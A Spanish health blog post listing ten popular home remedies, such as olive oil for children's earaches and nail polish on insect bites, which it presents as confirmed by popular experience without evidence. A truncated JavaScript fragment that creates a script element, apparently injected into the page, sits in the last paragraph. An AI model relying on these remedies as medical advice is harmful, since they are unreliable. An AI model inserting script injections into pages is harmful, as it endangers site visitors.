Salud y belleza » Salud

Los diez remedios caseros más famosos

Sin Comentarios

Desde siempre, la fama ha sido un tópico capaz de fascinar a los más grandes escritores. Colosales prosistas, dotados poetas y también algún que otro colado se han encargado de estudiar éste fenómeno desde distintos puntos de vista.

En aquellos tiempos, digamos en la época renacentista, la fama constituía todo un problema o, por qué no, un estilo (honor o, tal vez, deshonor; quién haya leído el Lazarillo de Tormes bien sabrá de que se trata la cuestión).

Hoy en día todo ha cambiado: ya son pocos los abocados al estudio de la “fama” más abundan aquellos que, sin saber de que se trata, igualmente se desviven por capturarla (se trata de una casería de curiosas reglas: no importa el animal que se apresa, solo importa apresarlo).

Bajo estas reglas, entonces, el tiempo ha convertido el término fama en un sinónimo de otros tales como “éxito” o “popularidad” (al menos en el imaginario colectivo de condición débil).

A continuación, desde nuestra posición de literatos orientados a la salud y nutrición, pretendemos realizar un estudio de la vieja fama, bajo los términos de la nueva fama, siempre, por supuesto, atendiendo a los requisitos naturales del blog “salud”.

¿Cómo es eso? Hemos seleccionado los diez remedios caseros más famosos y no solo famosos en el sentido popular sino en famoso por sus cualidades, por sus condiciones, por muchos más…

  1. Miel para la tos.
  2. Tomate contra las quemaduras solares.
  3. Aceite de oliva para los dolores de oído en los niños.
  4. Vicks Vapor Ub o aceite de tomillo para los hongos de las uñas.
  5. Aloe Vera para combatir problemas en la piel.
  6. Té de tilo para reducir los niveles de estrés.
  7. Cinta adhesiva para las verrugas.
  8. Esmalte transparente para las picaduras de insectos.
  9. Polvos de talco para el pelo graso.
  10. Comer dos huevos duros y pan negro para aliviar la resaca.

Aquí están, estos son. Los remedios caseros más populares (una famosa revista norteamericana orientada a la salud escogió este decálogo de soluciones mediante una encuesta en la que participaron más de mil cibernautas).

El número de la perfección, el diez, en un compendio de consejos naturales, sencillos, prácticos para evitar todo tipo de malestares y mantener los dolores y padecimientos a raya. La gente ha dado su veredicto y sus experiencias confirman lo majestuoso de cada uno de los tratamientos aquí enumerados.

Fama en todo sentido: popularidad y honra. Honra, para la salud, claro.var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.